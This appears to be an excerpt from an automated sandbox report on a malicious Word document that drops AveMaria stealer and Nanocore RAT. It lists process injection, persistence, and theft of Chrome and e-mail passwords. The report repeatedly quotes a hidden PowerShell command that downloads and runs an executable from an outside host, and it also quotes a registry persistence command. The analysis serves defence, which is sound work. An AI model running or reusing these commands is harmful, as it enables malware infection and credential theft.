Source: C:\Users\user\AppData\Local\Temp\images.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 120000
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 130000
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 16_2_0041405F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 17_2_0041405F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 18_2_0041405F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 25_2_0041405F
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C10353 keybd_event, 25_2_03C10353
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C1030F mouse_event, 25_2_03C1030F
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe 'C:\Users\user\AppData\Roaming\JhwfHBtD..exe'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError, 16_2_00412E91
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid, 16_2_00410A8C
Source: images.exe Binary or memory string: GetProgmanWindow
Source: images.exe Binary or memory string: SetProgmanWindow

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00410E5E cpuid 16_2_00410E5E
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: ToAsciiEx,GetLocaleInfoW,WideCharToMultiByte, 25_2_03BF907A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Queries volume information: C:\Users\user\AppData\Local\Temp\OICE_E3CA6E03-B995-4FF4-BE46-DA58B35F69D7.0\FLDE10.tmp VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\microA.exe Queries volume information: C:\Users\user\AppData\Roaming\microA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\microA.exe Queries volume information: C:\Users\user\AppData\Roaming\microA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\microA.exe Queries volume information: C:\Users\user\AppData\Roaming\microA.exe VolumeInformation
Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT VolumeInformation
Source: C:\ProgramData\images.exe Queries volume information: C:\ProgramData\images.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA, 16_2_00408D0F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C12AE1 IsSETEnabled,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetVersionExW,RegQueryValueExW,GetVersionExW,RegCloseKey,GetVersionExW, 25_2_03C12AE1
Source: C:\Users\user\AppData\Roaming\microA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connections per server for Internet Explorer
Source: C:\Users\user\AppData\Local\Temp\microA.exe Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Stealing of Sensitive Information:

Yara detected AveMaria stealer
Source: Yara match File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Google\Chrome\User Data\Default\Login Data 16_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Chromium\User Data\Default\Login Data 16_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Google\Chrome\User Data\Default\Login Data 17_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Chromium\User Data\Default\Login Data 17_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Google\Chrome\User Data\Default\Login Data 18_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Chromium\User Data\Default\Login Data 18_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: \Google\Chrome\User Data\Default\Login Data 25_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: \Chromium\User Data\Default\Login Data 25_2_0040B917
Contains functionality to steal e-mail passwords
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: POP3 Password 16_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: SMTP Password 16_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: IMAP Password 16_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: POP3 Password 17_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: SMTP Password 17_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: IMAP Password 17_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: POP3 Password 18_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: SMTP Password 18_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: IMAP Password 18_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: POP3 Password 25_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: SMTP Password 25_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: IMAP Password 25_2_004099FF
Yara detected Credential Stealer
Source: Yara match File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.microA.exe.2095f04.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2171424499.0000000003369000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AveMaria stealer
Source: Yara match File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C18A23 RemoveClipboardFormatListener, 25_2_03C18A23